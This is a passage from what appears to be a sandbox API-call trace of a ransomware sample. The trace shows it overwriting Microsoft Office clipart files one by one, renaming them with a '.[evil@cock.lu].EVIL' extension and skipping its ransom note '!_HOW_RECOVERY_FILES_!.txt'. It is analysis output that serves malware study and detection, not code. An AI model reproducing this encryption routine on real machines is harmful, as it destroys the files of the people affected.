_SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0131.299] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099199.GIF") returned 69 [0131.299] wcscmp (_String1="J0099199.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0131.299] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099199.GIF") returned 0x0 [0131.299] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099199.GIF") returned 0x45 [0131.299] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099199.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099199.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0131.301] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x84b7, lpOverlapped=0x0) returned 1 [0131.311] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.311] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.311] _errno () returned 0x84b1160840 [0131.311] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.311] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x84c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x84c0, lpOverlapped=0x0) returned 1 [0131.311] CloseHandle (hObject=0x1a8) returned 1 [0131.311] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099199.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0131.312] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0131.312] __uncaught_exception () returned 0x84b1160800 [0131.312] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0131.312] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099199.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099199.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099199.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099199.gif.[evil@cock.lu].evil")) returned 1 [0131.313] ??_V@YAXPEAX@Z () returned 0x1 [0131.575] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099199.GIF", dwFileAttributes=0x200) returned 0 [0131.575] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0131.575] wcsstr (_Str="J0099200.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0131.575] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099200.GIF") returned 69 [0131.575] wcscmp (_String1="J0099200.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0131.575] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099200.GIF") returned 0x0 [0131.575] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099200.GIF") returned 0x45 [0131.575] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099200.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099200.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0131.578] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x409f, lpOverlapped=0x0) returned 1 [0131.611] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.611] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.611] _errno () returned 0x84b1160840 [0131.611] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.611] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x40a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x40a0, lpOverlapped=0x0) returned 1 [0131.612] CloseHandle (hObject=0x1a8) returned 1 [0131.612] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099200.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0131.612] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0131.612] __uncaught_exception () returned 0x84b1160800 [0131.612] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0131.612] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099200.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099200.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099200.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099200.gif.[evil@cock.lu].evil")) returned 1 [0131.613] ??_V@YAXPEAX@Z () returned 0x1 [0131.617] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099200.GIF", dwFileAttributes=0x200) returned 0 [0131.617] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0131.617] wcsstr (_Str="J0099201.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0131.617] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099201.GIF") returned 69 [0131.617] wcscmp (_String1="J0099201.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0131.617] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099201.GIF") returned 0x0 [0131.617] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099201.GIF") returned 0x45 [0131.617] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099201.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099201.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0131.620] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xc8c9, lpOverlapped=0x0) returned 1 [0131.623] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.623] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.623] _errno () returned 0x84b1160840 [0131.623] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.623] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0xc8e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xc8e0, lpOverlapped=0x0) returned 1 [0131.623] CloseHandle (hObject=0x1a8) returned 1 [0131.623] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099201.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0131.624] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0131.624] __uncaught_exception () returned 0x84b1160800 [0131.624] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0131.624] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099201.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099201.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099201.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099201.gif.[evil@cock.lu].evil")) returned 1 [0131.625] ??_V@YAXPEAX@Z () returned 0x1 [0131.632] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099201.GIF", dwFileAttributes=0x200) returned 0 [0131.633] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0131.633] wcsstr (_Str="J0099202.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0131.633] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099202.GIF") returned 69 [0131.633] wcscmp (_String1="J0099202.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0131.633] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099202.GIF") returned 0x0 [0131.633] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099202.GIF") returned 0x45 [0131.633] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099202.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099202.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0131.635] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1367, lpOverlapped=0x0) returned 1 [0131.699] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.699] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.699] _errno () returned 0x84b1160840 [0131.700] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.700] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1380, lpOverlapped=0x0) returned 1 [0131.700] CloseHandle (hObject=0x1a8) returned 1 [0131.700] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099202.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0131.700] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0131.700] __uncaught_exception () returned 0x84b1160800 [0131.700] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0131.700] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099202.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099202.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099202.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099202.gif.[evil@cock.lu].evil")) returned 1 [0131.701] ??_V@YAXPEAX@Z () returned 0x1 [0131.704] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099202.GIF", dwFileAttributes=0x200) returned 0 [0131.704] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0131.704] wcsstr (_Str="J0099203.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0131.704] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099203.GIF") returned 69 [0131.704] wcscmp (_String1="J0099203.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0131.704] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099203.GIF") returned 0x0 [0131.704] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099203.GIF") returned 0x45 [0131.704] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099203.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099203.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0131.706] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xf40, lpOverlapped=0x0) returned 1 [0131.724] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.724] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.724] _errno () returned 0x84b1160840 [0131.724] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.724] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0xf60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xf60, lpOverlapped=0x0) returned 1 [0131.724] CloseHandle (hObject=0x1a8) returned 1 [0131.724] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099203.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0131.724] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0131.725] __uncaught_exception () returned 0x84b1160800 [0131.725] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0131.725] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099203.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099203.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099203.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099203.gif.[evil@cock.lu].evil")) returned 1 [0131.725] ??_V@YAXPEAX@Z () returned 0x1 [0131.728] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099203.GIF", dwFileAttributes=0x200) returned 0 [0131.728] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0131.728] wcsstr (_Str="J0099204.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0131.728] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099204.WMF") returned 69 [0131.728] wcscmp (_String1="J0099204.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0131.728] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099204.WMF") returned 0x0 [0131.728] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099204.WMF") returned 0x45 [0131.728] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099204.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099204.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0131.730] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x45be, lpOverlapped=0x0) returned 1 [0131.737] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.737] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.737] _errno () returned 0x84b1160840 [0131.738] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.738] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x45c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x45c0, lpOverlapped=0x0) returned 1 [0131.738] CloseHandle (hObject=0x1a8) returned 1 [0131.738] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099204.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0131.738] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0131.738] __uncaught_exception () returned 0x84b1160800 [0131.738] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0131.738] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099204.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099204.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099204.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099204.wmf.[evil@cock.lu].evil")) returned 1 [0131.739] ??_V@YAXPEAX@Z () returned 0x1 [0131.741] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099204.WMF", dwFileAttributes=0x200) returned 0 [0131.742] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0131.742] wcsstr (_Str="J0099205.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0131.742] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099205.WMF") returned 69 [0131.742] wcscmp (_String1="J0099205.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0131.742] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099205.WMF") returned 0x0 [0131.742] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099205.WMF") returned 0x45 [0131.742] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099205.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099205.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0131.743] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x45be, lpOverlapped=0x0) returned 1 [0131.771] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.771] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.771] _errno () returned 0x84b1160840 [0131.771] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.771] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x45c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x45c0, lpOverlapped=0x0) returned 1 [0131.771] CloseHandle (hObject=0x1a8) returned 1 [0131.771] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099205.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0131.772] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0131.772] __uncaught_exception () returned 0x84b1160800 [0131.772] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0131.772] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099205.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099205.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099205.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099205.wmf.[evil@cock.lu].evil")) returned 1 [0131.773] ??_V@YAXPEAX@Z () returned 0x1 [0131.775] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099205.WMF", dwFileAttributes=0x200) returned 0 [0131.775] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0131.775] wcsstr (_Str="J0101856.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0131.775] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101856.BMP") returned 69 [0131.775] wcscmp (_String1="J0101856.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0131.775] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0101856.BMP") returned 0x0 [0131.776] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101856.BMP") returned 0x45 [0131.776] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101856.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101856.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0131.778] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x133f8, lpOverlapped=0x0) returned 1 [0131.894] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.894] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.894] _errno () returned 0x84b1160840 [0131.894] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.894] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x13400, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x13400, lpOverlapped=0x0) returned 1 [0131.894] CloseHandle (hObject=0x1a8) returned 1 [0131.894] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101856.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0131.894] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0131.895] __uncaught_exception () returned 0x84b1160800 [0131.895] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0131.895] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101856.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101856.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101856.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101856.bmp.[evil@cock.lu].evil")) returned 1 [0131.895] ??_V@YAXPEAX@Z () returned 0x1 [0131.898] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101856.BMP", dwFileAttributes=0x200) returned 0 [0131.898] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0131.898] wcsstr (_Str="J0101857.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0131.898] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101857.BMP") returned 69 [0131.898] wcscmp (_String1="J0101857.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0131.898] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0101857.BMP") returned 0x0 [0131.898] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101857.BMP") returned 0x45 